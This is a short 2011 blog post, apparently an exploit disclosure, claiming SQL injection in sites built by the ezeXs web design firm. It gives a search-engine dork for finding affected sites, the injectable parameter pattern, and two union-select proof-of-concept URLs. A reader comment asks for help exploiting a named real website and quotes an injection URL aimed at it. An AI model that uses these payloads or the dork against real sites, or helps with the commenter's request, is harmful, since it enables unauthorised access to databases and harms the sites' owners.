Friday, April 15, 2011

ezeXs Web Design Vulnerable to SQL Injection


Title : ezeXs Web Design Vulnerable to SQL Injection
Web : http://www.ezexs.com/
By : p0pc0rn
Dork : intext:"Powered by ezexs.com"


Microsoft Access SQL Injection
------------------------------

http://site.com/[type].asp?[id]=[SQL]

Notes : All parameters are possible to be injected.

POC
---

http://site.com/product_detail.asp?Id=57 union select 1 from test.a
http://site.com/category.asp?Id=49 union select 1 from test.a



more out there.

thanks,
-p0pc0rn-
Share:

1 comments:

fahad said...

thanks man bt i can't exploit look

http://www.bjkdost.org/veri/haber/devam.asp?haber_id=569%201%20or%201=convert%28int,%28db_name%29%29--

please sow explain exploit the site :(



:$